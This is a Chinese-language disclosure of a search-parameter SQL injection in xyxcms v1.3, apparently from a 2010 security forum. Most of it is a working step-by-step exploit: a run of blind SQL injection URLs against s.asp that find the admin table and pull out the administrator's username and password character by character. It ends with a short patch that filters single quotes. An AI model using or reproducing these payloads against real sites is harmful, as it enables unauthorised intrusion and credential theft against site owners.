xyxcms v1.3 搜索注入漏洞
发布日期:2010-06.19发布作者:mars
影响版本:xyxcms v1.3
官方地址: [url]www.xyxcms.com[/url]
漏洞描述: 搜索页面代码过滤不严,导致字符串搜索型注入。
代码分析:s.asp 从这段代码可以看出 字符串搜索注入~
k=request.QueryString("k") page=request.QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if
漏洞测试利用方法:
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD '%25'=' 猜解数据库为admin
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD '%25'=' 判断管理员就1个
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD '%25'=' 管理员账户长度为4位
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD '%25'=' 管理员密码长度为8位
username长度是4
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(username,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD '%25'=' 用户第一位是m
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(username,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD '%25'=' 用户第二位是a
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(username,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD '%25'=' 用户第三位是r
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(username,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD '%25'=' 用户第四位是s
所以密码是mars
password长度为8
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,1,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD '%25'=' 密码第一位是1
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,2,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD '%25'=' 密码第二位是2
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,3,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD '%25'=' 密码第三位是3
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,4,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD '%25'=' 密码第四位是4
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第五位是q
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第六位是w
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,7,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD '%25'=' 密码第七位是q
[url]http://www.xxx.com/s.asp?k=1%25'[/url] AnD (SeLEcT AsC(MID(password,8,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD '%25'=' 密码第八位是w
所以密码是1234qwqw
漏洞修补方法 过滤掉' 就行了
k=request.QueryString("k") if instr(k,"'")>0 response.Write "<script>alert('error');window.close();</script>" response.End() end if page=request.QueryString("page") if page="" or isnumeric(page)=0 then g_cur_page=1 else g_cur_page=cint(page) end if
页:
[1]